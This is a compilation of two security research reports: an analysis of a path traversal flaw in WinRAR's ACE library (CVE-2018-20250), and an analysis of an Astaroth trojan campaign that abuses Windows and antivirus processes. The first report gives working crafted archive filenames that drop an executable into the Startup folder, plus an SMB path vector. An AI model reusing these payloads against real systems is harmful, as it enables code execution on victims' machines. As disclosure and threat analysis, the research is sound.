The Ram disk is mapped to drive R:\, and the folder tree looks like this:

Figure 8: Fuzzer’s folders hierarchy

Detecting the Path Traversal Bug

A short time after starting the fuzzer, we found a new folder named sourbe in a surprising location, in the root of drive R:\

Figure 9: ”sourbe”, the unexpected folder which created during fuzzing.

The harness is instructed to extract the fuzzed archive to sub-directories under “output_folders”. For example, R:\ACE_FUZZER\output_folders\Slave_2\ . So why do we have a new folder created in the parent directory?

Inside the sourbe folder we found a file named RED VERSION_¶ with the following content:

Figure 10: Content of the file that produced by the fuzzer in the unexpected path “R:\sourbe\RED VERSION_¶”.

This is the hex dump of the test case that triggers the vulnerability:

Figure 11: A hex dump of the file that produced by the fuzzer in the unexpected path “R:\sourbe\RED VERSION_¶”.

Notes:

  • We made some minor changes to this test case, (such as adjusting the CRC) to make it parsable by acefile.
  • For convenience, fields are marked with the same color in the hex dump and in
    the output from acefile.

Figure 12: Header parsing output from acefile.py for the file that produced by the fuzzer in the unexpected path.

These are the first three things that we noticed when we looked at the hex dump and the output from acefile:

  1. The fuzzer copied parts of the “advert” field to other fields:
    • The content of the compressed file is “SIO”, marked in an orange frame in the hex dump. It’s part of the advert string “*UNREGISTERED VERSION*”.
    • The filename field contain the string “RED VERSION*” which is part of the advert string “*UNREGISTERED VERSION*”.
  2. The path in the filename field was used in the extraction process as an “absolute path” instead of a relative path to the destination folder (the backslash is the root of the drive).
  3. The extract file name is “RED VERSION_¶”. It seems that the asterisk from the filename field was converted to an underscore and the \x14\ (0x14) value represented as “¶” in the extract file name. The other content of the filename field is ignored because there is a null char which terminates the string, after the \x14\ (0x14) value.

To find the constraints that caused it to ignore the destination folder and use the filename field as an absolute path during the extraction, we did the following attempts, based on our assumptions.

Our first assumption was the first character of the filename field (the ‘\’ char) triggers the vulnerability. Unfortunately, after a quick check we found out that this is not the case. After additional checks we arrived at these conclusions:

  1. The first char should be a ‘/’ or a ‘\’.
  2. ‘*’ should be included in the filename at least once; the location doesn’t matter.

Example of a filename field that triggers the bug: \some_folder\some_file*.exe will be extracted to C:\some_folder\some_file_.exe , and the asterisk is converted to an underscore (_).

Now that it worked on our fuzzing harness, it is time to test our crafted archive (e.g. exploit file) file on WinRAR.

Trying the exploit on WinRAR

At first glance, it looked like the exploit worked as expected on WinRAR, because the sourbe directory was created in the root of drive C:\ . However, when we entered the “sourbe” folder (C:\sourbe ) we noticed that the file was not created.

These behaviors raised two questions:

  • Why did the harness and WinRAR behave differently?
  • Why were the directories that were specified in the exploit file created, and the extracted file was not created?
Why did the harness and WinRAR behave differently?

We expected that the exploit file would behave the same on WinRAR as it behaved in our harness, for the following reasons:

  1. The dll (unacev2.dll ) extracts the files to the destination folder, and not the outer executable (WinRAR or our harness).
  2. Our harness mimics WinRAR perfectly when passing parameters / struct members to the dll.

A deeper look showed that we had a false assumption in our second point. Our harness defines 4 callbacks pointers, and our implemented callbacks differ from WinRAR’s callbacks. Let’s return to our harness implementation.

We mentioned this signature when calling the exported function named ACEInitDll.

INT __stdcall ACEInitDll(pACEInitDllStruc DllData);

pACEInitDllStruc is a pointer to the sACEInitDLLStruc struct. The first member of this struct is tACEGlobalDataStruc. This struct has many members, including pointers to callback functions with the following signature:

INT (__stdcall *InfoCallbackProc) (pACEInfoCallbackProcStruc Info);

INT (__stdcall *ErrorCallbackProc) (pACEErrorCallbackProcStruc Error);

INT (__stdcall *RequestCallbackProc) (pACERequestCallbackProcStruc Request);

INT (__stdcall *StateCallbackProc) (pACEStateCallbackProcStruc State);

These callbacks are called by the dll (unacev2.dll ) during the extraction process.
The callbacks are used as external validators for operations that about to happen, such as the creation of a file, creation of a directory, overwriting a file, etc.
The external callback/validators get information about the operation that’s about to occur, for example, file extraction, and returns its decision to the dll.

If the operation is allowed, the following constant is returned to the dll: ACE_CALLBACK_RETURN_OK Otherwise, if the operation is not allowed by the callback function, it returns the following constant: ACE_CALLBACK_RETURN_CANCEL, and the operation is aborted.

For more information about those callbacks function, see the explanation from the FarManager.

Our harness returned ACE_CALLBACK_RETURN_OK  for all the callback functions except for the ErrorCallbackProc, where it returned ACE_CALLBACK_RETURN_CANCEL.

It turns out, WinRAR does validation for the extracted filename (after they are extracted and created), and because of those validations in the WinRAR callback’s, the creation of the file was aborted. This means that after the file is created, it is deleted by WinRAR.

WinRAR Validators / Callbacks

This is part of the WinRAR callback’s validator pseudo-code that prevents the file creation:

Figure 13: WinRAR validator/callback pseudo-code.

SourceFileName” represents the relative path to the file that will be extracted.

The function does the following checks:

  1. The first char does not equal “\” or “/”.
  2. The File Name doesn’t start with the following strings “..\” or “../” which are gadgets for “Path Traversal”.
  3. The following “Path Traversal” gadgets does not exist in the string:
    1. \..\
    2. \../
    3. /../
    4. /..\

The extraction function in unacv2.dll calls StateCallbackProc in WinRAR, and passes the filename field of the ACE format as the relative path to be extracted to.

The relative path is checked by the WinRAR callback’s validator. The validators return ACE_CALLBACK_RETURN_CANCEL to the dll, (because the filename field starts with backslash “\”) and the file creation is aborted.

The following string passes to the WinRAR callback’s validator:

“\sourbe\RED VERSION_¶”

Note: This is the original filename with fields “\sourbe\RED VERSION*¶”. “unacev2.dll ” replaces the “*” with an underscore.

Why were the folders that were specified in the exploit file created and the extracted file was not created?

Because of a bug in the dll (“unacev2.dll ”), even if ACE_CALLBACK_RETURN_CANCEL returned from the callback, the folders specified in the relative path (filename field in ACE archive) will be created by the dll.

The reason for this is that unacev2.dll calls the external validator (callback) before the folder creation, but it checks the return value from the callbacks too late – after the creation of the folder. Therefore, it aborts the extraction operation just before writing content to the extracted file, before the call to WriteFile API.

It actually creates the extracted file, without writing content to it.  It calls to CreateFile API
and then checks the return code from the callback function. If the return code is ACE_CALLBACK_RETURN_CANCEL, it actually deletes the file that previously created by the call to CreateFile API.

Side Notes:

  • We found a way to bypass the deletion of the file, but it allows us to create empty files only. We can bypass the file deletion by adding “:” to the end of the file, which is treated as Alternate Data Streams. If the callback returns ACE_CALLBACK_RETURN_CANCEL, dll tries to delete the Alternate Data Stream of the file instead of the file itself.
  • There is another filter function in the dll code that aborts the extraction operation if the relative path string starts with “\” (slash). This happens in the first extraction stages, before the calls to any other filter function.
    However, by adding “*”or “?” characters (wildcard characters) to the relative path (filename field) of the compressed file, this check is skipped and the code flow can continue and (partially) trigger the Path Traversal vulnerability. This is why the exploit file which was produced by the fuzzer triggered the bug in our harness. It doesn’t trigger the bug in WinRAR because of the callback validator in the WinRAR code.

Summary of Intermediate Findings

  • We found a Path Traversal vulnerability in unacev2.dll . It enables our harness to extract the file to an arbitrary path, and completely ignore the destination folder, and treats the extracted file relative path as the full path.
  • Two constraints lead to the Path Traversal vulnerability (summarized in previous sections):
    1. The first char should be a ‘/’ or a ‘\’.
    2. ‘*’ should be included in the filename at least once. The location does not matter.
  • WinRAR is partially vulnerable to the Path Traversal:
    • unacev2.dll doesn’t abort the operation after getting the abort code from the WinRAR callback (ACE_CALLBACK_RETURN_CANCEL). Due to this delayed check of the return code from WinRAR callback, the directories specified in the exploit file are created.
    • The extracted file is created as well, on the full path specified in the exploit file (without content), but it is deleted right after checking the returned code from the callback (before the call to WriteFile API).
    • We found a way to bypass the deletion of the file, but it allows us to create empty files only.

Finding the Root Cause

At this point, we wanted to figure out why the destination folder is ignored, and the relative path of the archive files (filename field) is treated as the full path.

To achieve this goal, we could use static analysis and debugging, but we decided on a much quicker method. We used DynamoRio to record the code coverage in unacev2.dll of a regular ACE file and of our exploit file which triggered the bug. We then used the lighthouse plugin for IDA and subtracted one coverage path from the other.

These are the results we got:

Figure 14: Lighthouse’s coverage overview window. You can see the coverage subtraction in the “Composer” form, and one result highlighted in purple.

In the “Coverage Overview” window we can see a single result. This means there is only one basic block that was executed in the first attempt (marked in A) and wasn’t reached on the second attempt (marked in B).

The Lighthouse plugin marked the background of the diffed basic block in blue, as you can see in the image below.

Figure 15: IDA graph view of the main bug in unacev2.dll. Lighthouse marked the background of the diffed basic block in blue.

From the code coverage results, you can understand that the exploit file is not going through the diffed basic block (marked in blue), but it takes the opposite basic block (the false condition, marked with a red arrow).

If the code flow goes through the false condition (red arrow) the line that is inside the green frame replaces the destination folder with "" (empty string), and the later call to sprintf function, which concatenates the destination folder to the relative path of the extracted file.

The code flow to the true and false conditions, marked with green and red arrows respectively,
is influenced by the call to the function named GetDevicePathLen (inside the red frame).

If the result from the call to GetDevicePathLen equals 0, the sprintf looks like this:

sprintf(final_file_path, "%s%s", destination_folder, file_relative_path);

Otherwise:

sprintf(final_file_path, "%s%s", "", file_relative_path);

The last sprintf is the buggy code that triggers the Path Traversal vulnerability.

This means that the relative path will actually be treated as a fullpath to the file/directory that should be written/created.

Let’s look at GetDevicePathLen function to get a better understanding of the root cause:

Figure 16: GetDevicePathLen code.

The relative path of the extracted file is passed to GetDevicePathLen.
It checks if the device or drive name prefix appears in the Path parameter, and returns the length of that string, like this:

  • The function returns 3 for this path: C:\some_folder\some_file.ext
  • The function returns 1 for this path: \some_folder\some_file.ext
  • The function returns 15 for this path: \\LOCALHOST\C$\some_folder\some_file.ext
  • The function returns 21 for this path: \\?\Harddisk0Volume1\some_folder\some_file.ext
  • The function returns 0 for this path: some_folder\some_file.ext

If the return value from GetDevicePathLen is greater than 0, the relative path of the extracted file will be considered as the full path, because the destination folder is replaced by  an empty string during the call to sprintf, and this leads to Path Traversal vulnerability.

However, there is a function that “cleans” the relative path of the extract file, by omitting any sequences that are not allowed before the call to GetDevicePathLen.

This is a pseudo-code that cleans the path “CleanPath”.

Figure 17: Pseudo-code of CleanPath.

The function omits trivial Path Traversal sequences like “\..\”  (it only omits the “..\” sequence if it is found in the beginning of the path)  sequence, and it omits drive sequence like: “C:\C:”, and for an unknown reason, “C:\C:” as well.

Note that it doesn’t care about the first letter; the following sequence will be omitted as well: “_:\”, “_:”, “_:\_:” (In this case underscore represents any value).

Putting It All Together

To create an exploit file, which causes WinRAR to extract an archived file to an arbitrary path (Path Traversal),  extract to the Startup Folder (which gains code execution after reboot) instead of to the destination folder.

We should bypass two filter functions to trigger the bug.

To trigger the concatenation of an empty string to the relative path of the compressed file, instead of the destination folder:

sprintf(final_file_path, "%s%s", "", file_relative_path);

Instead of:

sprintf(final_file_path, "%s%s", destination_folder, file_relative_path);

The result from GetDevicePathLen function should be greater than 0.
It depends on the content of the relative path (“file_relative_path”). If the relative path starts the device path this way:

  • option 1C:\some_folder\some_file.ext
  • option 2\some_folder\some_file.ext (The first slash represents the current drive.)

The return value from GetDevicePathLen will be greater than 0.
However, there is a filter function in unacev2.dll named CleanPath (Figure 17) that checks if the relative path starts with C:\ and removes it from the relative path string before the call to GetDevicePathLen.

It omits the “C:\” sequence from the option 1 string but doesn’t omit “\” sequence from the option 2 string.

To overcome this limitation, we can add to option 1 another “C:\” sequence which will be omitted by CleanPath (Figure 17), and leave the relative path to the string as we wanted with one “C:\”,  like:

  • option 1’C:\C:\some_folder\some_file.ext  =>  C:\some_folder\some_file.ext

However, there is a callback function in WinRAR code (Figure 13), that is used as a validator/filter function. During the extraction process, unacev2.dll is called to the callback function that resides in the WinRAR code.

The callback function validates the relative path of the compressed file. If the blacklist sequence is found, the extraction operation will be aborted.

One of the checks that is made by the callback function is for the relative path that starts with “\” (slash).
But it doesn’t check for the  “C:\Therefore, we can use option 1’ to exploit the Path Traversal Vulnerability!

We also found an SMB attack vector, which enables it to connect to an arbitrary IP address and create files and folders in arbitrary paths on the SMB server.

Example:
C:\\\10.10.10.10\smb_folder_name\some_folder\some_file.ext => \\10.10.10.10\smb_folder_name\some_folder\some_file.ext

Example of a Simple Exploit File

We change the .ace extension to .rar extension, because WinRAR detects the format by the content of the file and not by the extension.

This is the output from acefile:

Figure 18: Header output by acefile.py of the simple exploit file.

We trigger the vulnerability by the crafted string of the filename field (in green).

This archive will be extracted to C:\some_folder\some_file.txt no matter what the path of the destination folder is.

Creating a Real Exploit

We can gain code execution, by extracting a compressed executable file from the ACE archive to one of the Startup Folders. Any files that reside in the Startup folders will be executed at boot time.
To craft an ACE archive that extracts its compressed files to the Startup folder seems to be trivial, but it’s not.
There are at least 2 Startup folders at the following paths:

  1. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
  2. C:\Users\<user name>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

The first path of the Startup folder demands high privileges / high integrity level (in case the UAC is on). However, WinRAR runs by default with a medium integrity level.

The second path of the Startup folder demands to know the name of the user.

We can try to overcome it by creating an ACE archive with thousands of crafted compressed files, any one of which contains the path to the Startup folder but with different <user name>, and hope that it will work in our target.

The Most Powerful Vector

We have found a vector which allows us to extract a file to the Startup folder without caring about the <user name>.

By using the following filename field in the ACE archive:

C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe

It is translated to the following path by the CleanPath function (Figure 17):

C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe

Because the CleanPath function removes the “C:\C: ” sequence.

Moreover, this destination folder will be ignored because the GetDevicePathLen function (Figure 16) will return 2 for the last “C:” sequence.

Let’s analyze the last path:

The sequence “C:” is translated by Windows to the “current directory” of the running process. In our case, it’s the current path of WinRAR.

If WinRAR is executed from its folder, the “current directory” will be this WinRAR folder: C:\Program Files\WinRAR

However, if WinRAR is executed by double clicking on an archive file or by right clicking on “extract” in the archive file, the “current directory” of WinRAR will be the path to the folder that the archive resides in.

Figure 19: WinRAR’s extract options (WinRAR’s shell extension added to write click)

For example, if the archive resides in the user’s Downloads folder, the “current directory” of WinRAR will be:
  C:\Users\<user name>\Downloads
If the archive resides in the Desktop folder, the “current directory” path will be:
  C:\Users\<user name>\Desktop

To get from the Desktop or Downloads folder to the Startup folder, we should go back one folder  “../” to the “user folder”, and concatenate  the relative path to the startup directory: AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ to the following sequence: “C:../

This is the end result:  C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe

Remember that there are 2 checks against path traversal sequences:

  • In the CleanPath function which skips such sequences.
  • In WinRAR’s callback function which aborts the extraction operation.

CleanPath checks for the following path traversal pattern: “\..\

The WinRAR’s callback function checks for the following patterns:

  1. “\..\”
  2. “\../”
  3. “/../”
  4. “/..\”

Because the first slash or backslash are not part of our sequence “C:../”, we can bypass the path traversal validation. However, we can only go back one folder. It’s all we need to extract a file to the Startup folder without knowing the user name.

Note: If we want to go back more than one folder, we should concatenate the following sequence “/../”. For example, “C:../../” and the “/../” sequence will be caught be the callback validator function and the extraction will be aborted.

Demonstration (POC)

Side Note

Toward the end of our research, we discovered that WinACE created an extraction utility like unacev2.dll for linux which is called unace-nonfree (compiled using Watcom compiler). The source code is available.
The source code for Windows (which unacev2.dll was built from) is included as well, but it’s older than the last version of unacev2.dll , and can’t be compiled/built for Windows. In addition,  some functionality is missing in the source code – for example, the checks in Figure 17 are not included.

However, Figure 16 was taken from the source code.
We also found the Path Traversal bug in the source code. It looks like this:

Figure 20:  The path traversal bug in the source code of unace-nonfree


CVEs:

CVE-2018-20250, CVE-2018-20251, CVE-2018-20252, CVE-2018-20253.

WinRAR’s Response

WinRAR decided to drop UNACEV2.dll from their package, and WinRAR doesn’t support ACE format from version number: “5.70 beta 1”.

Quote from WinRAR website:

“Nadav Grossman from Check Point Software Technologies informed us about a security vulnerability in UNACEV2.DLL library.
Aforementioned vulnerability makes possible to create files in arbitrary folders inside or outside of destination folder 
when unpacking ACE archives. 
WinRAR used this third party library to unpack ACE archives.
UNACEV2.DLL had not been updated since 2005 and we do not have access to its source code.
So we decided to drop ACE archive format support to protect security of WinRAR users.

We are thankful to Check Point Software Technologies for reporting  this issue.“

Check Point’s SandBlast Agent Behavioral Guard protect against these threats.

Check Point’s IPS blade provides protections against this threat: “RARLAB WinRAR ACE Format Input Validation Remote Code Execution (CVE-2018-20250)”

ASTAROTH MALWARE USES LEGITIMATE OS AND ANTIVIRUS PROCESSES TO STEAL PASSWORDS AND PERSONAL DATA

Original text by CYBEREASON NOCTURNUS RESEARCH

RESEARCH BY: ELI SALEM

In 2018, we saw a dramatic increase in cyber crimes in Brazil and, separately, the abuse of legitimate native Windows OS processes for malicious intent. Cyber attackers used living off the land binaries (LOLbins) to hide their malicious activity and operate stealthily in target systems. Using native, legitimate operating system tools, attackers were able to infiltrate and gain remote access to devices without any malware. For organizations with limited visibility into their environment, this type of attack can be fatal.


In this research, we explain one of the most recent and unique campaigns involving the Astaroth trojan.This Trojan and information stealer was recognized in Europe and chiefly affected Brazil through the abuse of native OS processes and the exploitation of security-related products.

Brazil is constantly being hit with cybercrime. To read about another pervasive attack in Brazil, check out our blog post. 

«/>

Pervasive Brazilian Financial Malware Targets Bank Customers in Latin America and Europe

The Cybereason Platform was able to detect this new variant of the Astaroth Trojan in a massive spam campaign that targeted Brazil and parts of Europe. Our Active Hunting Service team was able to analyze the campaign and identify that it maliciously took advantage of legitimate tools like the BITSAdmin utilityand the WMIC utility to interact with a C2 server and download a payload. It was also able to use a component of multinational antivirus software Avast to gain information about the target system, as well as a process belonging to Brazilian information security company GAS Tecnologia to gather personal information. With a sophisticated attack such as this, it is critical for your security team to have a clear understanding of your environment so they can swiftly detect malicious activity and respond effectively. 

UNIQUE ASPECTS TO THIS LATEST VERSION OF THE ASTAROTH TROJAN CAMPAIGN

The Astaroth Trojan campaign is a phishing-based campaign that gained momentum towards the end of 2018 and was identified in thousands of incidents. Early versions differed significantly from later versions as the adversaries advanced and optimized their attack. This version contrasted significantly from previous versions in four key ways.

  1. This version maliciously used BITSAdmin to download the attackers payload. This differed from early versions of the campaign that used certutil.
  2. This version injects a malicious module into one of Avast’s processes, whereas early versions of the campaign detected Avast and quit. As Avast is the most common antivirus software in the world, this is an effective evasive strategy.
  3. This version of the campaign made malicious use of unins000.exe, a process that belongs to the Brazilian information security company GAS Tecnologia, to gather personal information undetected. This trusted process is prevalent on Brazilian machines. To the best of our knowledge, no other versions of the malware used this process.
  4. This version used a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and help hide the code it is initiating. Earlier versions did not use this method.

A BREAKDOWN OF THE LATEST ASTAROTH TROJAN SPAM CAMPAIGN

As with many traditional spam campaigns, this campaign begins with a .7zip file. This file gets downloaded to a user machine through a mail attachment or a mistakenly-pressed hyperlink.

The downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware.

 

The .lnk file extracted from the .7zip file.

An obfuscated command is located inside the Target bar in the .lnk file properties. 

Hidden command inside the .lnk file.

The full obfuscated command inside the .lnk file.

When the .lnk file is initialized, it spawns a CMD process. This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw).

wmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI). This utility is able to execute complicated WQL queries and WMI methods. It is often used by attackers for lateral movement, reconnaissance, and basic code invocation. By using a trusted, native utility, the attackers can hide the scope of the full attack and evade detection.

The initial attack vector as detected by the Cybereason Platform.

wmic.exe creates a .txt file with information about the domain that stores the remote XSL script. It identifies the location of the infected machine, including country, city, and other information. Once this information is gathered, it sends location data about the infected machine to the remote XSL script.

This location data gives the attacker a unique edge, as they can specify a target country or city to attack and maximize their accuracy when choosing a particular target. 

 The .txt file contains information about the C2 domain and infected machine, as detected in a Cybereason Lab environment.

PHASE ONE: AN ANALYSIS OF THE REMOTE XSL

The remote XSL script that wmic.exe sends information to contains highly obfuscated JScript code that will execute additional steps of the malicious activity. The code is obfuscated in order to hide any malicious activity on the remote server.

Initially, the XSL script defines several variables for command execution and data storage. It also creates several ActiveX objects. The majority of ActiveX Objects created with Wscript.Shell and Shell.Applicationare used to run programs, create shortcuts, manipulate the contents of the registry, or access system folders. These variables are used to invoke legitimate Windows OS processes for malicious activities, and serve as a bridge between the remote domain that stores the script and the infected machine.  

Malicious script variables.

OBFUSCATION MECHANISM FOR THE JSCRIPT CODE

The malicious JScript code obfuscation relies on two main techniques.

  1. The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign.
  2. The script uses the function radador(), which returns a randomized integer. This function is able to obfuscate code so that every iteration of the code is presented differently. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign. 

 String.fromCharCode() usage in the XSL script. 

The random number generator function radador().

 These two obfuscation techniques are used to bypass antivirus defenses and make security researcher investigations more challenging.

CHOOSING A C2 SERVER

The XSL script contains variable xparis() that holds the C2 domain the malicious files will be downloaded from. In order to extend the lifespan of the domains in case one or more are blacklisted, there are twelve different C2 domains that xparis() can be set to. In order to decide which domain xparis() holds, a variable pingadori() uses the radador() function to randomize the domain. pingadori() is a random integer between one and twelve, which decides which domain xparis() is assigned.

The C2 domain selection mechanism.

One of the most used functions in the XSL script is Bxaki()Bxaki() takes a URL and a file as arguments. It downloads the file to the infected machine from the input URL using BITSAdmin, and is called every time the script attempts to download a file.

In previous iterations, the Astaroth Trojan campaign used cerutil to download files. In order to hide this process, it was renamed certis. In this iteration, they have replaced certutil with BITSAdmin.

 Bxaki obfuscated function.

soulto

Bxaki deobfuscated function.

In order to gain access to the infected computer’s file system, the XSL script uses the variable fso with FileSystemObject capabilities. This variable is created using an ActiveX object. The XSL script contains additional hard coded variables sVarRaz and sVar2RazX, which contain file paths that direct to the downloaded files. 

The file’s path.  

The directory creation. 

DOWNLOADING THE PAYLOADS

The remote XSL script downloads twelve files from the C2 server that masquerade themselves as JPEG, GIF, and extensionless files. These files are downloaded to a directory (C:\Users\Public\Libraries\tempsys) on the infected machine by Bxaki() and xparis(). Within these twelve files are the Astaroth Trojan modules, several additional files the Trojan may use to extend its capabilities, and an r1.log file. The r1.log file stores information for exfiltration. A thorough explanation of what information is collected can be found in a breakdown by Cofense from late 2018. 

The script verifies all parts of the malware have been downloaded. 

After downloading the payload, the XSL script checks to make sure every piece of the malware was downloaded. 

One of the twelve download commands as detected by the Cybereason platform in same variant of Astaroth. 

The twelve downloaded files.

DETECTING AVAST 

A unique feature of this latest Astaroth Trojan campaign is the malware’s ability to search for specific security products and exploit them.

 In earlier variants, upon detecting Avast, the XSL script would simply quit. Instead, it now uses Avast to execute malicious actions. 

Similar to earlier versions of the Astaroth Trojan campaign, the XSL script searches for Avast on the infected machine, and specifically targets a certain process of Avast aswrundll.exe. It uses three variables stem1stem2, and stem3 that, when combined, form a specific path (C:\Program Files\AVAST Software\AVAST\aswRunDll.exe) to aswRundll.exe. It obfuscates this path using the fromCharCode()function.

aswrundll.exe is the Avast Software Runtime Dynamic Link Library that is responsible for running modules for Avast. If aswrundll.exe exists at this path, Avast exists on the machine.

Note: aswrundll.exe is very similar to Microsoft’s own rundll32.exe — it allows you to execute DLLs by calling their exported functions. The use of aswrundll.exe as a LOLbin has been mentioned in the past year.

jsfile3

Stem variables presented as unicode strings.

Stem variables decoded to ASCII.

MANIPULATING AVAST

Once the XSL script has identified that Avast is installed on the machine, it loads a malicious module Irdsnhrxxxfery64 from its location on disk. In order to load this module, it uses an ActiveX Object ShAcreated with Shell.Application capabilities. The object uses ShellExecute() to create an aswrundll.exeprocess instance and loads Irdsnhrxxxfery64. It loads the module with parameter vShow set to zero, which opens the application with a hidden window. 

Alternatively, if Avast is not installed on the machine, the malicious module loads using regsvr32.exeregsvr32.exe is a native Windows utility for registering and unregistering DLLs and ActiveX controls in the Windows registry. 

 The script attempts to load the malicious module using regsvr with the run function. 

Procmon shows the malicious module loaded to the Avast process.

Procmon shows the malicious module loaded using the regsvr32.exe process.  

PHASE TWO: PAYLOAD ANALYSIS 

The only module the XSL script loads is Irdsnhrxxxfery64, which is packed using the UPX packer.

 Information pertaining to lrdsnhxxfery64.~.

After unpacking the module, it is packed with an additional inner packer Pe123\RPolyCryptor. This module has to be investigated in a dynamic way to fully understand the malware and the role the module played during execution.

Information pertaining to lrdsnhrxxfery64_Unpacked.dll.

 Throughout the malware execution, Irdsnhrxxxfery64.~ acts as the main malware controller. The module initiates the malicious activity once the payload download is complete. It executes the other modules and collects initial information about the machine, including information about the network, locale, and the keyboard language. 

 The main module collecting information about the machine.

CONTINUING MALICIOUS ACTIVITY AND MANIPULATING ADDITIONAL SECURITY PRODUCTS

After the module loads with regsvr32.exe, the Irdsnhrxxxfery64 module injects another module Irdsnhrxxxfery98, which was downloaded by the script into regsvr32.exe using the LoadLibraryExW()function.

Similar to the previous case, if Avast and aswrundll.exe are on the machine, Irdsnhrxxxfery98 will be injected into that process instead of regsvr32.exe

Irdsnhrxxxfery64 injecting lrdsnhrxxfery98.

The malicious modules in regsvr32.exe memory

After the Irdsnhrxxxfery98 module is loaded, the malware searches different processes to continue its malicious activity depending on the way Irdsnhrxxxfery64 was loaded.

  1. If Irdsnhrxxxfery64 is loaded using aswrundll.exe, the module will continue to target aswrundll.exe.It will create new instances and continue to inject malicious content to it.
  2. If Irdsnhrxxxfery64 is loaded using regsvr32.exe, it will target three processes:
  • It will target unins000.exe if it is available. unins000.exe is a process developed by GAS Tecnologia that is common on Brazilian machines.
  • If unins000.exe does not exist, it will target Syswow64\userinit.exeuserinit.exe is a native Windows process that specifies the program that Winlogon runs when a user logs on to their computer.
  • Similarly, if unins000.exe and Syswow64\userinit.exe do not exist, it will target System32\userinit.exe.

The malware searches for targeted processes.

Irdsnhrxxxfery64 manipulation on userinit.exe & unins000.exe

INJECTION TECHNIQUE TO INCREASE STEALTHINESS

After locating one of the target processes, the malware uses Process Hollowing (MITRE Technique T1093) to evasively create a new process from a legitimate source. This new process is in a suspended state so the malware can unmap its memory and write its contents to the new, allocated space. Once this is complete, it will resume the suspended process. By using this technique, the malware is able to leverage itself from a signed and verified legitimate Windows OS process, or, alternatively, if aswrundll.exe or unins000.exe exists, a signed and verified security product process.

Astaroth module creates a process in a suspended state (dwCreationFlags set to 4).

Unmapping process memory.

Writing content and resuming the process.

The Cybereason platform was able to detect the malicious injection, identifying Irdsnhrxxxfery64.~Irdsnhrxxxfery98.~, and module arqueiro

The downloaded modules found in regsvr32.exe as detected by the Cybereason platform.

DATA EXFILTRATION

The second module Irdsnhrxxxfery98.~ is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate.

monitor98

Irdsnhrxxxfery98 information collecting capabilities.

In addition to its own information stealing capabilities, the Astaroth Trojan campaign also uses an external feature NetPass. NetPass is one of the downloaded payload files renamed to lrdsnhrxxferyb.jpg.

NetPass is a free network password recovery tool that, according to its developer Nirsoft, can recover passwords including:

  • Login passwords of remote computers on LAN.
  • Passwords of mail accounts on an exchange server stored by Microsoft Outlook.
  • Passwords of MSN Messenger and Windows Messenger accounts.
  • Internet Explorer 7.x and 8.x passwords from password-protected web sites that include Basic Authentication or Digest Access Authentication.
  • The item name of Internet Explorer 7 passwords that always begin with Microsoft_WinInet prefix.
  • The passwords stored by Remote Desktop 6. 

NetPass usage.

ATTACK FLOW AND EXFILTRATION

After injecting into the targeted processes, the modules continue their malicious activity through those processes. The malware executes malicious activity in a small period of time through the target process, deletes itself, and then repeats. This occurs periodically and is persistent.

3 ways

The malware’s different functionality.

Once the targeted processes are infected by the malicious modules, they begin communicating with the payload C2 server and exfiltrating information saved to the r1.log file. The communication and exfiltration of data was detected in a real-world scenario using the Cybereason platform.

The malicious use of GAS Tecnologia security process unins000.exe. 

Data exfiltration from unins000.exe to a malicious IP. 

CONCLUSION

Our Active Hunting Service was able to detect both the malicious use of the BITSAdmin utility and the WMIC utility. Our customer immediately stopped the attack using the remediation section of our platform and prevented any exfiltration of data. From there, our hunting team identified the rest of the attack and completed a thorough analysis.

We were able to detect and evaluate an evasive infection technique used to spread a variant of the Astaroth Trojan as part of a large, Brazilian-based spam campaign. In our discovery, we highlighted the use of legitimate, built-in Windows OS processes used to perform malicious activities to deliver a payload without being detected, as well as how the Astaroth Trojan operates and installs multiple modules covertly. We also showed its use of well-known tools and antivirus products to expand its capabilities. The analysis of the tools and techniques used in the Astaroth campaign show how truly effective LOLbins are at evading antivirus products. As we enter 2019, we anticipate that the use of LOLbins will likely increase. Because of the great potential for malicious exploitation inherent in the use of native processes, it is very likely that many other information stealers will adopt this method to deliver their payload into targeted machines.

As a result of this detection, the customer was able to contain an advanced attack before any damage was done. The Astaroth Trojan was controlled, WMIC was disabled, and the attack was halted in its tracks.

Part of the difficulty identifying this attack is in how it evades detection. It is difficult to catch, even for security teams aware of the complications ensuring a secure system, as with our customer above. LOLbins are deceptive because their execution seems benign at first, or even sometimes safe, as with the malicious use of antivirus software. As the use of LOLbins becomes more commonplace, we suspect this complex method of attack will become more common as well. The potential for damage will grow as attackers will look to other more destructive payloads.

For more information on LOLbins in the wild, read our research into a different Trojan. 

LOLbins and Trojans: How the Ramnit Trojan Spreads via sLoad in a Cyberattack

INDICATORS OF COMPROMISE

SHA101782747C12Bf06A52704A144DB59FEC41B3CB36HashNF-e513468.zip

SHA11F83403398964D4E8B6C70B171C51CD278909172HashScript.js
SHA1CE8BDB56CCAC55C6881701EBD39DA316EE7ED18DHashlrdsnhrxxfery64.~
SHA1926137A50f473BBD257CD19E207C1C9114F6B215Hashlrdsnhrxxfery98.~
SHA15579E03EB1DA076EF939196CB14F8B769F30A302Hashlrdsnhrxxferyb.jpg
SHA1B2734835888756929EE3FF4DCDE85080CB299D2AHashlrdsnhrxxferyc.jpg
SHA1206352E13D601239E2D043D971EA6657C091071AHashlrdsnhrxxferydwwn.gif
SHA1EAE82A63A980998F8D388BCCE7D967F28309F593Hashlrdsnhrxxferydwwn.gif
SHA19CD5A399C9320CBFB87C9D1CAD3BC366FB12E54FHashlrdsnhrxxferydx.gif
